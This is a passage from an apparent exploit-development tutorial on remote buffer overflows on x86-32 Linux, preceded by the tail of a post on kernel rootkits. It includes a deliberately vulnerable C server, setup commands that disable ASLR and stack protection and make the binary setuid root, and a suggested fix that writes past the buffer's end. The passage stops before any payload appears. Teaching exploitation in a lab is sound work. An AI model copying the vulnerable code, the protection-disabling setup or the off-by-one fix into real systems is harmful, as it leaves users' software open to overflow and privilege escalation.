useful for userland/kernelland communication, this can be done with system calls to a degree but its a lot more difficult to implement a system call in an LKM./p pWhen doing any kernel development, the kernel source is a necessity, you can download it from https://www.kernel.org/, see what version of the kernel you have, using codeuname -r/code, and download the correct source. Getting used to the kernel source will make you a much better kernel developer and ultimately a better rootkit developer./p pLastly I'd like to highlight again that any form of kernel development is very dangerous to the system you are developing on, you risk crashing the system and even corrupting data, only do this on a development machine and if stuff breaks don't blame me for any damage done!/p pHappy Hacking :-)/p

Remote Exploitation

12 June 2014 at 21:59
By: 0xe7
pThis is the third part in our series on exploit research on x86-32 Linux systems. a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"Part 1/a was an introduction into a href="http://en.wikipedia.org/wiki/Buffer_overflow" target="_blank"buffer overflows/a and a href="/x86-32-linux/2014/05/20/plain-format-string-vulnerability/"part 2/a was an introduction to a href="http://en.wikipedia.org/wiki/Uncontrolled_format_string" target="_blank"format string vulnerabilities/a./p pBoth of the previous posts have been targeting local applications, here I will introduce remote exploitation and try to describe the differences between exploiting a local or a remote application while demonstrating remote exploitation./p !-- more -- h2The Vulnerable App/h2 pI've tried to keep the application as similar to the application we used in part 1 and 2 as possible, obviously some changes needed to be made:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/span span class="code-line"span class="normal"57/span/span span class="code-line"span class="normal"58/span/span span class="code-line"span class="normal"59/span/span span class="code-line"span class="normal"60/span/span span class="code-line"span class="normal"61/span/span span class="code-line"span class="normal"62/span/span span class="code-line"span class="normal"63/span/span span class="code-line"span class="normal"64/span/span span class="code-line"span class="normal"65/span/span span class="code-line"span class="normal"66/span/span span class="code-line"span class="normal"67/span/span span class="code-line"span class="normal"68/span/span span class="code-line"span class="normal"69/span/span span class="code-line"span class="normal"70/span/span span class="code-line"span class="normal"71/span/span span class="code-line"span class="normal"72/span/span span class="code-line"span class="normal"73/span/span span class="code-line"span class="normal"74/span/span span class="code-line"span class="normal"75/span/span span class="code-line"span class="normal"76/span/span span class="code-line"span class="normal"77/span/span span class="code-line"span class="normal"78/span/span span class="code-line"span class="normal"79/span/span span class="code-line"span class="normal"80/span/span span class="code-line"span class="normal"81/span/span span class="code-line"span class="normal"82/span/span span class="code-line"span class="normal"83/span/span span class="code-line"span class="normal"84/span/span span class="code-line"span class="normal"85/span/span span class="code-line"span class="normal"86/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;sys/socket.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;netinet/in.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;strings.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"span class="cp"#define PORT 9999/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendfile/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"senderror/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[]);/spanspan class="w"/span/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"main/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"listenfd/spanspan class="p",/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"servaddr/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"socklen_t/spanspan class="w" /spanspan class="n"clilen/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"pid_t/spanspan class="w" /spanspan class="n"childpid/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"pwd/spanspan class="p"[/spanspan class="mi"1000/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"listenfd/spanspan class="o"=/spanspan class="n"socket/spanspan class="p"(/spanspan class="n"AF_INET/spanspan class="p",/spanspan class="n"SOCK_STREAM/spanspan class="p",/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"bzero/spanspan class="p"(/spanspan class="o"amp;/spanspan class="n"servaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"servaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_family/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"AF_INET/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_addr/spanspan class="p"./spanspan class="n"s_addr/spanspan class="o"=/spanspan class="n"htonl/spanspan class="p"(/spanspan class="n"INADDR_ANY/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"servaddr/spanspan class="p"./spanspan class="n"sin_port/spanspan class="o"=/spanspan class="n"htons/spanspan class="p"(/spanspan class="n"PORT/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"((/spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"bind/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"servaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"servaddr/spanspan class="p")))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error: Unable to bind to port %d/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"PORT/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"listen/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",/spanspan class="mi"1024/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="p"(;;)/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"clilen/spanspan class="o"=/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"connfd/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"accept/spanspan class="p"(/spanspan class="n"listenfd/spanspan class="p",(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="o"amp;/spanspan class="n"clilen/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"n/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"recvfrom/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p",/spanspan class="w" /spanspan class="mi"1000/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"clilen/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"pwd/spanspan class="p"[/spanspan class="n"n/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"senderror/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendfile/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Received the following:/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;%s/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"pwd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"close/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"sendfile/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"c/spanspan class="p",/spanspan class="w" /spanspan class="mi"1/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"senderror/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="k"struct/span span class="nc"sockaddr_in/spanspan class="w" /spanspan class="n"cliaddr/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[])/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;Wrong password: quot;/spanspan class="p",/spanspan class="w" /spanspan class="mi"16/spanspan class="w" /spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"p/spanspan class="p"),/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"sendto/spanspan class="p"(/spanspan class="n"connfd/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="mi"1/spanspan class="w" /spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="p"(/spanspan class="k"struct/span span class="nc"sockaddr/spanspan class="w" /spanspan class="o"*/spanspan class="p")/spanspan class="o"amp;/spanspan class="n"cliaddr/spanspan class="p",/spanspan class="k"sizeof/spanspan class="p"(/spanspan class="n"cliaddr/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThe main differences here are that the communication between the user and the application is done over a network, instead of via command line arguments, and that there is no format string vulnerability./p h3The Fix/h3 pThe vulnerability is in the same line as the a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/"plain buffer overflow post/a in the codecheckpass/code function on line 82. This should be changed to codestrncpy(p, a, sizeof(p)-1);/code and explicitly insert the null character at the end codep[512] = '\0';/code./p h2Setting Up The Environment/h2 pThere are 3 main differences (and a few minor ones) when doing exploit development for remote applications. The first is pretty obvious, when doing exploit research it is impossible to develop an exploit on a target application which resides on a machine which you don't control./p pWhile its best not to develop an exploit on a target machine (because you want to be as quiet as possible so not to raise suspicion of the administrator), with local application attacks it is assumed that you already have access to the machine (otherwise you will not be able to attack it) so it is totally possible to do the development on the target machine providing the tools that you need are on there (ie. a debugger, disassembler, compiler...) or you have the means to install them./p pBut with a network application it is unlikely that you already have access to the machine and as we have seen in the first 2 parts of this series while you are developing the exploit you will need to restart the application numerous times. For this reason it is best to do a lot of reconnaissance to get as much information about the environment that the application is running in as possible because you will then want to try to replicate that environment as much as possible for the development environment./p pThe more you replicate the real environment, the more likely you will succeed with the actual exploitation./p pI will be using the same system and environment as before but I will create a new user to run the application as:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~# /spanadduser appuser/span span class="code-line"span class="go"Adding user `appuser#39; .../span/span span class="code-line"span class="go"Adding new group `appuser#39; (1002) .../span/span span class="code-line"span class="go"Adding new user `appuser#39; (1002) with group `appuser#39; .../span/span span class="code-line"span class="go"Creating home directory `/home/appuser#39; .../span/span span class="code-line"span class="go"Copying files from `/etc/skel#39; .../span/span span class="code-line"span class="go"Enter new UNIX password: /span/span span class="code-line"span class="go"Retype new UNIX password: /span/span span class="code-line"span class="go"passwd: password updated successfully/span/span span class="code-line"span class="go"Changing the user information for testuser/span/span span class="code-line"span class="go"Enter the new value, or press ENTER for the default/span/span span class="code-line"span class="go" Full Name []: /span/span span class="code-line"span class="go" Room Number []: /span/span span class="code-line"span class="go" Work Phone []: /span/span span class="code-line"span class="go" Home Phone []: /span/span span class="code-line"span class="go" Other []: /span/span span class="code-line"span class="go"Is the information correct? [Y/n]/span/span span class="code-line"span class="gp"[email protected]:~# /spanls/span span class="code-line"span class="go"app-net.c/span/span span class="code-line"span class="gp"[email protected]:~# /spangcc -z execstack -fno-stack-protector -o app-net app-net.c/span span class="code-line"span class="gp"[email protected]:~# /spancp app-net /home/appuser//span span class="code-line"span class="gp"[email protected]:~# /spancat /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="go"2/span/span span class="code-line"span class="gp"[email protected]:~# /spanspan class="nb"echo/span span class="m"0/span gt; /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="gp"[email protected]:~# /spancat /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="go"0/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanls -l/span span class="code-line"span class="go"total 8/span/span span class="code-line"span class="go"-rwxr-xr-x 1 root root 7824 Jun 15 13:48 app-net/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanchmod u+s app-net /span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanls -l/span span class="code-line"span class="go"total 8/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 7824 Jun 15 13:48 app-net/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanspan class="nb"echo/span span class="err"#39;/spanThis is a top secret file!/span span class="code-line"span class="go"gt; Only people with the password should be able to view this file!#39; gt; secret.txt/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw-r--r-- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanchmod span class="m"600/span secret.txt/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw------- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spancat secret.txt/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"span class="gp"[email protected]:/home/appuser# /spansu - appuser/span span class="code-line"span class="gp"[email protected]:~$ /spanls -l/span span class="code-line"span class="go"total 12/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 7824 Jun 15 13:48 app-net/span/span span class="code-line"span class="go"-rw------- 1 root root 91 May 5 09:51 secret.txt/span/span span class="code-line"span class="gp"[email protected]:~$ /spancat secret.txt /span span class="code-line"span class="go"cat: secret.txt: Permission denied/span/span span class="code-line"/code/pre/div /td/tr/table pSo this is the setup for my development environment, my attack and target machine are the same machine, I'll just be using seperate user accounts./p pI will be attacking the application over the a href="http://www.tldp.org/LDP/nag/node66.html" target="_blank"loopback interface/a (127.0.0.1). The actual network you attack over is irrelevant I'm using the same machine and the loopback interface for simplicity and reliability./p pThe application will be running as the user codeappuser/code, the application again has the setuid bit set because the file that it sends when the correct password is received is only readable by root. This also means we are able to elevate our privileges to root as in the last 2 parts./p pWe now need to run the application on the "server side":/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app-net /span span class="code-line"/code/pre/div /td/tr/table pThe server is now listening on port 9999:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~# /spanlsof span class="p"|/span grep -i listen span class="p"|/span grep span class="m"9999/span/span span class="code-line"span class="go"app-net 18826 root 3u IPv4 191330 0t0 TCP *:9999 (LISTEN)/span/span span class="code-line"/code/pre/div /td/tr/table h2Testing The App/h2 pFirst we need to look at what output we should expect normally:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanspan class="nb"echo/span -n span class="s2"quot;Aquot;/span span class="p"|/span nc span class="m"127/span.0.0.1 span class="m"9999/span/span span class="code-line"span class="go"Wrong password: A/span/span span class="code-line"/code/pre/div /td/tr/table pSo we get "Wrong password: " and our input, I'm going to show you 2 ways to do this, first we write a fuzzer and launch it like before, we can use this python script:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span 